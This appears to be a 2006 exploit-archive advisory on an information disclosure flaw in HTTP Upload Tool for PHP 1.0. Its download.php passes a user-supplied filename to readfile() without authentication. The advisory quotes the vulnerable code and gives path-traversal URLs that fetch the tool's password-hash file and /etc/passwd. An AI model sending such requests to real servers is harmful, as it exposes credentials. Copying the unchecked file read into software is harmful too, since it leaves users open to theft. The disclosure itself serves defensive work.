HTTP Upload Tool (download.php) Information Disclosure Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : HTTP Upload Tool (download.php) Information Disclosure Vulnerability
# Published : 2006-11-16
# Author : Craig Heffner
# Previous Title : Etomite CMS <= 0.6.1.2 (manager/index.php) Local File Include Exploit
# Next Title : TorrentFlux <= 2.2 (Create/Exec/Delete) Multiple Remote Vulnerabilities

#######################################################################################
# Target:
#
#       HTTP Upload Tool For PHP 1.0
#       http://uploadtool.sourceforge.net/
#
# Vulnerability:
#
#       Information disclosure
#
# Description:
#
#       The download.php file in Upload Tool for PHP neither verifies that a
#       requestor has authenticated, nor performs any sanity checking on the file
#       being requested. This allows an unauthenticated user to download any file
#       which the web server has read rights to, including the users.conf file which
#       contains a list of Upload Tool's users and their hashed passwords.
#
# Vulnerable Code (truncated):
#
#       $filename = $_GET['filename'];
#       readfile("$filename");
#
# Exploit:
#
#       http://www.examplesite.com/upload/bin/download.php?filename=../conf/users.conf
#       http://www.examplesite.com/upload/bin/download.php?filename=/etc/passwd
#
# Discovered:
#
#       Craig Heffner
#       heffnercj [at] gmail.com
#       http://www.craigheffner.com
#######################################################################################

# www.Syue.com [2006-11-16]